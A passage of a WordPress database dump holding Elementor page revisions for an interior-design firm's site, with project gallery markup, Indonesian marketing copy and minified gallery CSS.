href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson-390x473.jpg\" alt=\"Philip Johnson\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n				Philip Johnson\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Domestic-390x473.jpg\" alt=\"Domestic\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n				Domestic\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/buildings-390x473.jpg\" alt=\"Buildings\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n				Buildings\n							</a>\n		</h3>\n        <h4>no data</h4>','Residential','','inherit','closed','closed','','560-revision-v1','','','2022-11-14 03:53:18','2022-11-14 03:53:18','',560,'https://bauhaus.futuremediatrix.com/?p=4680',0,'revision','',0),(4681,1,'2022-11-14 03:54:35','2022-11-14 03:54:35','<h3>our recent work</h3>\n														<h2>\n								Bahaus Commercial Projects							</h2>\n							<p> Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.\nKami senantiasa berkomitmen dalam mewujudkan desain interior yang menjawab 3 tantangan ini. </p>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMS5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMi5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMy5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>','Commercial','','publish','closed','closed','','commercial','','','2023-09-22 08:38:28','2023-09-22 08:38:28','',0,'https://bauhaus.futuremediatrix.com/?page_id=4681',0,'page','',0),(4682,1,'2022-11-14 03:54:51','2022-11-14 03:54:51','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\".architect\">\n                    Architect                </li>\n                                <li data-slug=\".design\">\n                    Design                </li>\n                                <li data-slug=\".interior\">\n                    Interior                </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson-390x473.jpg\" alt=\"Philip Johnson\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n				Philip Johnson\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Domestic-390x473.jpg\" alt=\"Domestic\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n				Domestic\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/buildings-390x473.jpg\" alt=\"Buildings\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n				Buildings\n							</a>\n		</h3>\n        <h4>no data</h4>','Commercial','','inherit','closed','closed','','4681-revision-v1','','','2022-11-14 03:54:51','2022-11-14 03:54:51','',4681,'https://bauhaus.futuremediatrix.com/?p=4682',0,'revision','',0),(4683,1,'2022-11-14 03:56:52','2022-11-14 03:56:52','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\".architect\">\n                    Architect                </li>\n                                <li data-slug=\".design\">\n                    Design                </li>\n                                <li data-slug=\".interior\">\n                    Interior                </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson-390x473.jpg\" alt=\"Philip Johnson\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n				Philip Johnson\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Domestic-390x473.jpg\" alt=\"Domestic\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n				Domestic\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/buildings-390x473.jpg\" alt=\"Buildings\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n				Buildings\n							</a>\n		</h3>\n        <h4>no data</h4>','Projects','','inherit','closed','closed','','560-revision-v1','','','2022-11-14 03:56:52','2022-11-14 03:56:52','',560,'https://bauhaus.futuremediatrix.com/?p=4683',0,'revision','',0),(4684,1,'2022-11-14 03:59:37','2022-11-14 03:59:37','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\".architect\">\n                    Architect                </li>\n                                <li data-slug=\".design\">\n                    Design                </li>\n                                <li data-slug=\".interior\">\n                    Interior                </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson-390x473.jpg\" alt=\"Philip Johnson\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n				Philip Johnson\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Domestic-390x473.jpg\" alt=\"Domestic\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n				Domestic\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/buildings-390x473.jpg\" alt=\"Buildings\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n				Buildings\n							</a>\n		</h3>\n        <h4>no data</h4>','Residential','','inherit','closed','closed','','560-revision-v1','','','2022-11-14 03:59:37','2022-11-14 03:59:37','',560,'https://bauhaus.futuremediatrix.com/?p=4684',0,'revision','',0),(4685,1,'2022-11-14 04:00:50','2022-11-14 04:00:50','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n					<h2>\n						<!-- show line -->\n													<a href=\"https://bauhaus.futuremediatrix.com/residential/\">\n								Residential							</a>\n					</h2>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />															\n					<h2>\n						<!-- show line -->\n													<a href=\"https://bauhaus.futuremediatrix.com/commercial/\">\n								Commercial							</a>\n					</h2>\n															<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />','Projects','','publish','closed','closed','','projects','','','2022-11-14 04:19:06','2022-11-14 04:19:06','',0,'https://bauhaus.futuremediatrix.com/?page_id=4685',0,'page','',0),(4686,1,'2022-11-14 04:01:02','2022-11-14 04:01:02','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\".architect\">\n                    Architect                </li>\n                                <li data-slug=\".design\">\n                    Design                </li>\n                                <li data-slug=\".interior\">\n                    Interior                </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson-390x473.jpg\" alt=\"Philip Johnson\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n				Philip 